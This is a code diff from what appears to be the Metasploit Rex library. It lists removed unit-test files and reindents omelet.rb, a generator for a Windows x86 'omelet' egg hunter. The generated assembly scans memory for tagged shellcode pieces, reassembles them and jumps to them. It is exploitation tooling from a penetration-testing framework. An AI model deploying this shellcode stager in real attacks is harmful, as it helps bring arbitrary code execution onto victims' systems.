data/lib/rex/proto/http/response.rb.ut.rb +0 -150
data/lib/rex/proto/http/server.rb.ut.rb +0 -80
data/lib/rex/proto/ntlm.rb.ut.rb +0 -181
data/lib/rex/proto/rfb.rb.ut.rb +0 -40
data/lib/rex/proto/smb.rb.ts.rb +0 -9
data/lib/rex/proto/smb/client.rb.ut.rb +0 -224
data/lib/rex/proto/smb/constants.rb.ut.rb +0 -19
data/lib/rex/proto/smb/simpleclient.rb.ut.rb +0 -129
data/lib/rex/proto/smb/utils.rb.ut.rb +0 -21
data/lib/rex/proto/tftp/server.rb.ut.rb +0 -29
data/lib/rex/service_manager.rb.ut.rb +0 -33
data/lib/rex/socket.rb.ut.rb +0 -108
data/lib/rex/socket/comm/local.rb.ut.rb +0 -76
data/lib/rex/socket/parameters.rb.ut.rb +0 -52
data/lib/rex/socket/range_walker.rb.ut.rb +0 -56
data/lib/rex/socket/ssl_tcp.rb.ut.rb +0 -40
data/lib/rex/socket/ssl_tcp_server.rb.ut.rb +0 -62
data/lib/rex/socket/subnet_walker.rb.ut.rb +0 -29
data/lib/rex/socket/switch_board.rb.ut.rb +0 -53
data/lib/rex/socket/tcp.rb.ut.rb +0 -65
data/lib/rex/socket/tcp_server.rb.ut.rb +0 -45
data/lib/rex/socket/udp.rb.ut.rb +0 -45
data/lib/rex/test.rb +0 -36
data/lib/rex/text.rb.ut.rb +0 -193
data/lib/rex/transformer.rb.ut.rb +0 -39
data/lib/rex/ui/text/color.rb.ut.rb +0 -19
data/lib/rex/ui/text/progress_tracker.rb.ut.rb +0 -35
data/lib/rex/ui/text/table.rb.ut.rb +0 -56

data/lib/rex/exploitation/omelet.rb CHANGED

@@ -16,305 +16,305 @@ module Exploitation
 ###
 class Omelet
-	###
-	#
-	# Windows-based eggs-to-omelet hunters
-	#
-	###
-	module Windows
-		Alias = "win"
-		module X86
-			Alias = ARCH_X86
-			#
-			# The hunter stub for win/x86.
-			#
-			def hunter_stub
-				{
-					# option hash members go here (currently unused)
-				}
-			end
-		end
-	end
-	###
-	#
-	# Generic interface
-	#
-	###
-	#
-	# Creates a new hunter instance and acquires the sub-class that should
-	# be used for generating the stub based on the supplied platform and
-	# architecture.
-	#
-	def initialize(platform, arch = nil)
-		Omelet.constants.each { |c|
-			mod = self.class.const_get(c)
-			next if ((!mod.kind_of?(::Module)) or (!mod.const_defined?('Alias')))
-			if (platform =~ /#{mod.const_get('Alias')}/i)
-				self.extend(mod)
-				if (arch and mod)
-					mod.constants.each { |a|
-						amod = mod.const_get(a)
-						next if ((!amod.kind_of?(::Module)) or
-							(!amod.const_defined?('Alias')))
-						if (arch =~ /#{mod.const_get(a).const_get('Alias')}/i)
-								amod = mod.const_get(a)
-								self.extend(amod)
-							end
-						}
-					end
-				end
-			}
-		end
-		#
-		# This method generates an eggs-to-omelet hunter using the derived hunter stub.
-		#
-		def generate(payload, badchars = '', opts = {})
-			eggsize       = opts[:eggsize] || 123
-			eggtag        = opts[:eggtag] || "00w"
-			searchforward = opts[:searchforward] || true
-			reset         = opts[:reset]
-			startreg      = opts[:startreg]
-			usechecksum   = opts[:checksum]
-			adjust        = opts[:adjust] || 0
-			return nil if ((opts = hunter_stub) == nil)
-			# calculate number of eggs
-			payloadlen = payload.length
-			delta = payloadlen / eggsize
-			delta = delta * eggsize
-			nr_eggs = payloadlen / eggsize
-			if delta < payloadlen
-				nr_eggs = nr_eggs+1
-			end
-			nr_eggs_hex = "%02x" % nr_eggs
-			eggsize_hex = "%02x" % eggsize
-			hextag = ''
-			eggtag.each_byte do |thischar|
-				decchar = "%02x" % thischar
-				hextag = decchar + hextag
-			end
-			hextag = hextag + "01"
-			# search forward or backward ?
-			setflag      = nil
-			searchstub1  = nil
-			searchstub2  = nil
-			flipflagpre  = ''
-			flipflagpost = ''
-			checksum     = ''
-			if searchforward
-				# clear direction flag
-				setflag     = "cld"
-				searchstub1 = "dec edx\n\tdec edx\n\tdec edx\n\tdec edx"
-				searchstub2 = "inc edx"
-			else
-				# set the direction flag
-				setflag      = "std"
-				searchstub1  = "inc edx\n\tinc edx\n\tinc edx\n\tinc edx"
-				searchstub2  = "dec edx"
-				flipflagpre  = "cld\n\tsub esi,-8"
-				flipflagpost = "std"
-			end
-			# will we have to adjust the destination address ?
-			adjustdest = ''
-			if adjust > 0
-				adjustdest = "\n\tsub edi,#{adjust}"
-			elsif adjust < 0
-				adjustdest = "\n\tadd edi,#{adjust}"
-			end
-			# prepare the stub that starts the search
-			startstub = ''
-			if startreg
-				if startreg.downcase != 'ebp'
-					startstub << "mov ebp,#{startreg}"
-				end
-				startstub << "\n\t" if startstub.length > 0
-				startstub << "mov edx,ebp"
-			end
-			# a register will be used as start location for the search
-			startstub << "\n\t" if startstub.length > 0
-			startstub << "push esp\n\tpop edi\n\tor di,0xffff"
-			startstub << adjustdest
-			# edx will be used, start at end of stack frame
-			if not startreg
-				startstub << "\n\tmov edx,edi"
-				if reset
-					startstub << "\n\tpush edx\n\tpop ebp"
-				end
-			end
-			# reset start after each egg was found ?
-			# will allow to find eggs when they are out of order/sequence
-			resetstart = ''
-			if reset
-				resetstart = "push ebp\n\tpop edx"
-			end
+  ###
+  #
+  # Windows-based eggs-to-omelet hunters
+  #
+  ###
+  module Windows
+    Alias = "win"
+    module X86
+      Alias = ARCH_X86
+      #
+      # The hunter stub for win/x86.
+      #
+      def hunter_stub
+        {
+          # option hash members go here (currently unused)
+        }
+      end
+    end
+  end
+  ###
+  #
+  # Generic interface
+  #
+  ###
+  #
+  # Creates a new hunter instance and acquires the sub-class that should
+  # be used for generating the stub based on the supplied platform and
+  # architecture.
+  #
+  def initialize(platform, arch = nil)
+    Omelet.constants.each { |c|
+      mod = self.class.const_get(c)
+      next if ((!mod.kind_of?(::Module)) or (!mod.const_defined?('Alias')))
+      if (platform =~ /#{mod.const_get('Alias')}/i)
+        self.extend(mod)
+        if (arch and mod)
+          mod.constants.each { |a|
+            amod = mod.const_get(a)
+            next if ((!amod.kind_of?(::Module)) or
+              (!amod.const_defined?('Alias')))
+            if (arch =~ /#{mod.const_get(a).const_get('Alias')}/i)
+                amod = mod.const_get(a)
+                self.extend(amod)
+              end
+            }
+          end
+        end
+      }
+    end
+    #
+    # This method generates an eggs-to-omelet hunter using the derived hunter stub.
+    #
+    def generate(payload, badchars = '', opts = {})
+      eggsize       = opts[:eggsize] || 123
+      eggtag        = opts[:eggtag] || "00w"
+      searchforward = opts[:searchforward] || true
+      reset         = opts[:reset]
+      startreg      = opts[:startreg]
+      usechecksum   = opts[:checksum]
+      adjust        = opts[:adjust] || 0
+      return nil if ((opts = hunter_stub) == nil)
+      # calculate number of eggs
+      payloadlen = payload.length
+      delta = payloadlen / eggsize
+      delta = delta * eggsize
+      nr_eggs = payloadlen / eggsize
+      if delta < payloadlen
+        nr_eggs = nr_eggs+1
+      end
+      nr_eggs_hex = "%02x" % nr_eggs
+      eggsize_hex = "%02x" % eggsize
+      hextag = ''
+      eggtag.each_byte do |thischar|
+        decchar = "%02x" % thischar
+        hextag = decchar + hextag
+      end
+      hextag = hextag + "01"
+      # search forward or backward ?
+      setflag      = nil
+      searchstub1  = nil
+      searchstub2  = nil
+      flipflagpre  = ''
+      flipflagpost = ''
+      checksum     = ''
+      if searchforward
+        # clear direction flag
+        setflag     = "cld"
+        searchstub1 = "dec edx\n\tdec edx\n\tdec edx\n\tdec edx"
+        searchstub2 = "inc edx"
+      else
+        # set the direction flag
+        setflag      = "std"
+        searchstub1  = "inc edx\n\tinc edx\n\tinc edx\n\tinc edx"
+        searchstub2  = "dec edx"
+        flipflagpre  = "cld\n\tsub esi,-8"
+        flipflagpost = "std"
+      end
+      # will we have to adjust the destination address ?
+      adjustdest = ''
+      if adjust > 0
+        adjustdest = "\n\tsub edi,#{adjust}"
+      elsif adjust < 0
+        adjustdest = "\n\tadd edi,#{adjust}"
+      end
+      # prepare the stub that starts the search
+      startstub = ''
+      if startreg
+        if startreg.downcase != 'ebp'
+          startstub << "mov ebp,#{startreg}"
+        end
+        startstub << "\n\t" if startstub.length > 0
+        startstub << "mov edx,ebp"
+      end
+      # a register will be used as start location for the search
+      startstub << "\n\t" if startstub.length > 0
+      startstub << "push esp\n\tpop edi\n\tor di,0xffff"
+      startstub << adjustdest
+      # edx will be used, start at end of stack frame
+      if not startreg
+        startstub << "\n\tmov edx,edi"
+        if reset
+          startstub << "\n\tpush edx\n\tpop ebp"
+        end
+      end
+      # reset start after each egg was found ?
+      # will allow to find eggs when they are out of order/sequence
+      resetstart = ''
+      if reset
+        resetstart = "push ebp\n\tpop edx"
+      end
          		#checksum code by dijital1 & corelanc0d3r
-			if usechecksum
-				checksum = <<EOS
-	xor ecx,ecx
-	xor eax,eax
+      if usechecksum
+        checksum = <<EOS
+  xor ecx,ecx
+  xor eax,eax
 calc_chksum_loop:
-	add al,byte [edx+ecx]
-	inc ecx
-	cmp cl, egg_size
-	jnz calc_chksum_loop
+  add al,byte [edx+ecx]
+  inc ecx
+  cmp cl, egg_size
+  jnz calc_chksum_loop
 test_chksum:
-	cmp al,byte [edx+ecx]
-	jnz find_egg
+  cmp al,byte [edx+ecx]
+  jnz find_egg
 EOS
-			end
+      end
-			# create omelet code
-			omelet_hunter = <<EOS
+      # create omelet code
+      omelet_hunter = <<EOS
-	nr_eggs equ 0x#{nr_eggs_hex}	; number of eggs
-	egg_size equ 0x#{eggsize_hex} 	; nr bytes of payload per egg
-	hex_tag equ 0x#{hextag}		; tag
+  nr_eggs equ 0x#{nr_eggs_hex}	; number of eggs
+  egg_size equ 0x#{eggsize_hex} 	; nr bytes of payload per egg
+  hex_tag equ 0x#{hextag}		; tag
-	#{setflag}			; set/clear direction flag
-	jmp start
+  #{setflag}			; set/clear direction flag
+  jmp start
-	; routine to calculate the target location
-	; for writing recombined shellcode (omelet)
-	; I'll use EDI as target location
-	; First, I'll make EDI point to end of stack
-	; and I'll put the number of shellcode eggs in eax
+  ; routine to calculate the target location
+  ; for writing recombined shellcode (omelet)
+  ; I'll use EDI as target location
+  ; First, I'll make EDI point to end of stack
+  ; and I'll put the number of shellcode eggs in eax
 get_target_loc:
-	#{startstub}		; use edx as start location for the search
-	xor eax,eax		; zero eax
-	mov al,nr_eggs		; put number of eggs in eax
+  #{startstub}		; use edx as start location for the search
+  xor eax,eax		; zero eax
+  mov al,nr_eggs		; put number of eggs in eax
 calc_target_loc:
-	xor esi,esi		; use esi as counter to step back
-	mov si,0-(egg_size+20)	; add 20 bytes of extra space, per egg
+  xor esi,esi		; use esi as counter to step back
+  mov si,0-(egg_size+20)	; add 20 bytes of extra space, per egg
 get_target_loc_loop:	; start loop
-	dec edi		; step back
-	inc esi		; and update ESI counter
-	cmp si,-1	; continue to step back until ESI = -1
-	jnz get_target_loc_loop
-	dec eax		; loop again if we did not take all pieces
+  dec edi		; step back
+  inc esi		; and update ESI counter
+  cmp si,-1	; continue to step back until ESI = -1
+  jnz get_target_loc_loop
+  dec eax		; loop again if we did not take all pieces
                ; into account yet
-	jnz calc_target_loc
+  jnz calc_target_loc
-	; edi now contains target location
-	; for recombined shellcode
-	xor ebx,ebx		; put loop counter in ebx
-	mov bl,nr_eggs+1
-	ret
+  ; edi now contains target location
+  ; for recombined shellcode
+  xor ebx,ebx		; put loop counter in ebx
+  mov bl,nr_eggs+1
+  ret
 start:
-	call get_target_loc	; jump to routine which will calculate shellcode dst address
+  call get_target_loc	; jump to routine which will calculate shellcode dst address
-	; start looking for eggs, using edx as basepointer
-	jmp search_next_address
+  ; start looking for eggs, using edx as basepointer
+  jmp search_next_address
 find_egg:
-	#{searchstub1}		; based on search direction
+  #{searchstub1}		; based on search direction
 search_next_address:
-	#{searchstub2}		; based on search direction
-	push edx		; save edx
-	push 0x02   ; use NtAccessCheckAndAuditAlarm syscall
-	pop eax		; set eax to 0x02
-	int 0x2e
-	cmp al,0x5		; address readable ?
-	pop edx		; restore edx
-	je search_next_address  ; if addressss is not readable, go to next address
-	mov eax,hex_tag	; if address is readable, prepare tag in eax
-	add eax,ebx		; add offset (ebx contains egg counter, remember ?)
-	xchg edi,edx		; switch edx/edi
-	scasd			; edi points to the tag ?
-	xchg edi,edx		; switch edx/edi back
-	jnz find_egg		; if tag was not found, go to next address
-	;found the tag at edx
+  #{searchstub2}		; based on search direction
+  push edx		; save edx
+  push 0x02   ; use NtAccessCheckAndAuditAlarm syscall
+  pop eax		; set eax to 0x02
+  int 0x2e
+  cmp al,0x5		; address readable ?
+  pop edx		; restore edx
+  je search_next_address  ; if addressss is not readable, go to next address
+  mov eax,hex_tag	; if address is readable, prepare tag in eax
+  add eax,ebx		; add offset (ebx contains egg counter, remember ?)
+  xchg edi,edx		; switch edx/edi
+  scasd			; edi points to the tag ?
+  xchg edi,edx		; switch edx/edi back
+  jnz find_egg		; if tag was not found, go to next address
+  ;found the tag at edx
    ;do we need to verify checksum ? (prevents finding corrupted eggs)
    #{checksum}
 copy_egg:
-	; ecx must first be set to egg_size (used by rep instruction) and esi as source
-	mov esi,edx		; set ESI = EDX (needed for rep instruction)
-	xor ecx,ecx
-	mov cl,egg_size	; set copy counter
-	#{flipflagpre}		; flip destination flag if necessary
-	rep movsb		; copy egg from ESI to EDI
-	#{flipflagpost}		; flip destination flag again if necessary
-	dec ebx		; decrement egg
-	#{resetstart}		; reset start location if necessary
-	cmp bl,1		; found all eggs ?
-	jnz find_egg		; no = look for next egg
-	; done - all eggs have been found and copied
+  ; ecx must first be set to egg_size (used by rep instruction) and esi as source
+  mov esi,edx		; set ESI = EDX (needed for rep instruction)
+  xor ecx,ecx
+  mov cl,egg_size	; set copy counter
+  #{flipflagpre}		; flip destination flag if necessary
+  rep movsb		; copy egg from ESI to EDI
+  #{flipflagpost}		; flip destination flag again if necessary
+  dec ebx		; decrement egg
+  #{resetstart}		; reset start location if necessary
+  cmp bl,1		; found all eggs ?
+  jnz find_egg		; no = look for next egg
+  ; done - all eggs have been found and copied
 done:
-	call get_target_loc	; re-calculate location where recombined shellcode is placed
-	cld
-	jmp edi		; and jump to it :)
+  call get_target_loc	; re-calculate location where recombined shellcode is placed
+  cld
+  jmp edi		; and jump to it :)
 EOS
-			the_omelet = Metasm::Shellcode.assemble(Metasm::Ia32.new, omelet_hunter).encode_string
+      the_omelet = Metasm::Shellcode.assemble(Metasm::Ia32.new, omelet_hunter).encode_string
-			# create the eggs array
-			total_size = eggsize * nr_eggs
-			padlen = total_size - payloadlen
-			payloadpadding = "A" * padlen
+      # create the eggs array
+      total_size = eggsize * nr_eggs
+      padlen = total_size - payloadlen
+      payloadpadding = "A" * padlen
-			fullcode = payload + payloadpadding
-			eggcnt = nr_eggs + 2
-			startcode = 0
+      fullcode = payload + payloadpadding
+      eggcnt = nr_eggs + 2
+      startcode = 0
-			eggs = []
-			while eggcnt > 2 do
-				egg_prep = eggcnt.chr + eggtag
-				this_egg = fullcode[startcode, eggsize]
+      eggs = []
+      while eggcnt > 2 do
+        egg_prep = eggcnt.chr + eggtag
+        this_egg = fullcode[startcode, eggsize]
             if usechecksum
-					cksum = 0
-					this_egg.each_byte { |b|
-						cksum += b
-					}
-					this_egg << [cksum & 0xff].pack('C')
-				end
+          cksum = 0
+          this_egg.each_byte { |b|
+            cksum += b
+          }
+          this_egg << [cksum & 0xff].pack('C')
+        end
-				this_egg = egg_prep + this_egg
-				eggs << this_egg
+        this_egg = egg_prep + this_egg
+        eggs << this_egg
-				eggcnt -= 1
-				startcode += eggsize
-			end
+        eggcnt -= 1
+        startcode += eggsize
+      end
-			return [ the_omelet, eggs ]
-		end
+      return [ the_omelet, eggs ]
+    end
 protected
-	#
-	# Stub method that is meant to be overridden.  It returns the raw stub that
-	# should be used as the omelet maker (combine the eggs).
-	#
-	def hunter_stub
-	end
+  #
+  # Stub method that is meant to be overridden.  It returns the raw stub that
+  # should be used as the omelet maker (combine the eggs).
+  #
+  def hunter_stub
+  end
 end
 end